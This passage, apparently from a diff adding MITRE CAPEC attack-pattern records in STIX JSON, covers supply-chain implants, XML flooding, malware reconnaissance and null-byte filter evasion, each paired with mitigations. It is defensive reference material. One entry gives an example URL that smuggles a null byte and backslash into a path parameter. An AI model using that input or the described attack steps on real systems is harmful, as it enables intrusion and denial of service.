"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker has created a piece of malicious 
software designed to function as a backdoor in a system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim's network for further malicious activities." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Entry Point: The adversary must first identify a system that they wish to target and search for an entry point they can use to install the malicious software. This could be a system which they have prior knowledge of, giving them insight into the software and environment.

  2. Techniques
    Use a JTAGulator to identify exposed JTAG and UART interfaces in smaller embedded systems.
    Identify exposed USB connectors that could be used to load software.
  3. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

  4. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test Malicious Software: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

  2. Techniques
    Design malicious software that will give an adversary a backdoor into the system once it is deployed to the victim.
    Obtain already designed malicious software that just need to be placed into the system.

Exploit

  1. Implant Software in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary implants the malicious software into the system. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Malicious software creation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deploy strong code integrity policies to allow only authorized apps to run.", + "id": "course-of-action--5cd8f024-ef85-4ead-a600-9a8e45e14265", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7977ee36-e9dd-4362-8a07-7921c10bfa77", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cd8f024-ef85-4ead-a600-9a8e45e14265", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use endpoint detection and response solutions that can automaticalkly detect and remediate suspicious activities.", + "id": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", 
+ "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a9e07347-a756-464a-9d08-127f1ed81bf7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain a highly secure build and update infrastructure by immediately applying security patches for OS and software, implementing mandatory integrity controls to ensure only trusted tools run, and requiring multi-factor authentication for admins.", + "id": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--17e26e5a-6708-4c5c-b559-87469e885b6f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "Require SSL for update channels and implement certificate transparency based verification.", + "id": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90739ef7-b15d-4d24-bc46-6b8a4a460db0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign everything, including configuration files, XML files and packages.", + "id": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c3b0185-14be-491f-9447-065542f68070", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Develop an incident response process, disclose supply chain incidents and notify customers with accurate and timely information.", + "id": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe330f06-2741-49df-9e82-3eea2c36031c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-524", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/524.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Rogue Integration Procedures", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker gains access to a system integrator's documentation for the preparation of purchased systems designated for deployment at the victim's location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker's own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to an integration facility that prepares the system before it is deployed at the victim location." 
+ ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb65fed4-9856-4cc8-b152-6e50459d73cb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cd8f024-ef85-4ead-a600-9a8e45e14265", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa96d7c5-a195-4776-8593-4c3da18a0788", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e2b7ea2-a95c-44d2-88af-b8f040f18920", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c109c7e5-daa6-42f0-81a6-5416db0cc058", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--219a5740-2430-4bff-9bab-743bd8be41d4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8c51a053-7c7e-4e4f-98a1-9bfa45da752c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain strong physical system access controls and monitor networks and physical facilities for insider threats.", + "id": "course-of-action--da4c5f85-68af-498c-a2cb-7dc95e9c7115", 
+ "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-524-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5318f2ea-5803-44c4-883f-e69b2e824665", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da4c5f85-68af-498c-a2cb-7dc95e9c7115", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. 
In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing.", + "external_references": [ + { + "external_id": "CAPEC-528", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/528.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "Network Denial of Service:Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + } + ], + "id": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XML Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." 
+ ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.

  2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

Experiment

  1. An adversary crafts input data that may have an adverse effect on the operation of the web service when the XML data sent to the service.

Exploit

  1. Launch a resource depletion attack: The attacker delivers a large number of XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.

  2. Techniques
    Send a large number of crafted XML messages to the target URL.
", + "x_capec_extended_description": "\n XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e" + ], + "x_capec_prerequisites": [ + "The target must receive and process XML transactions.", + "An adverssary must possess the ability to generate a large amount of XML based messages to send to the target service." 
+ ], + "x_capec_skills_required": { + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90c77905-bef0-451f-b726-1225d30da2de", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "spec_version": "2.1", + "target_ref": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56794f75-72f9-4d9c-8fe4-a17e9e46b6c5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.", + "external_references": [ + { + "external_id": "CAPEC-529", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/529.html" + } + ], + "id": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Malware-Directed Internal 
Reconnaissance", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4", + "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have internal, logical access to the target network and system." + ], + "x_capec_resources_required": [ + "The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Medium": "The adversary must be able to obtain or develop, as well as place malicious software inside the target network/system." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7dcaa766-8fbb-4cf2-9d26-1cb5b3739b11", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7d31992-837d-4b43-91fb-5fd7cffc161b", + "spec_version": "2.1", + "target_ref": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-529-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a65abf1a-adf4-4c4d-9dbb-1ad3f3be601b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an adversary to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.", + "external_references": [ + { + "external_id": "CAPEC-53", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/53.html" + }, + { + "external_id": "CWE-158", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Postfix, Null Terminate, and Backslash", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A rather simple injection is possible in a URL:\n http://getAccessHostname/sekbin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=[insert relative path here][%00][%5C]&chapter=\n This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects postfix null byte(s) followed by a backslash to observe how the application handles them as input. The adversary is looking for areas where user input is placed in the middle of a string, and the null byte causes the application to stop processing the string at the end of the user input.

  2. Techniques
    Try different encodings for null such as \\0 or %00 followed by an encoding for the backslash character.

Exploit

  1. Remove data after null byte(s): After determined entry points that are vulnerable, the adversary places a null byte(s) followed by a backslash such that they bypass an input filter and remove data after the null byte(s) in a way that is beneficial to them.

  2. Techniques
    If the input is a directory as part of a longer file path, add a null byte(s) followed by a backslash at the end of the input to try to traverse to the given directory.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Null terminators are not properly handled by the filter." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.", + "id": "course-of-action--49efb31f-83a6-4f63-9415-6e82bf0893c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-53-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4b7d2bed-d8be-4a5d-8206-5c90b09eb190", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49efb31f-83a6-4f63-9415-6e82bf0893c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--abcb5f5a-ead2-47e3-b3cf-1e493ca049e9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eebe9446-5ca8-4441-ae14-9baa42c6bf1a", + "modified": 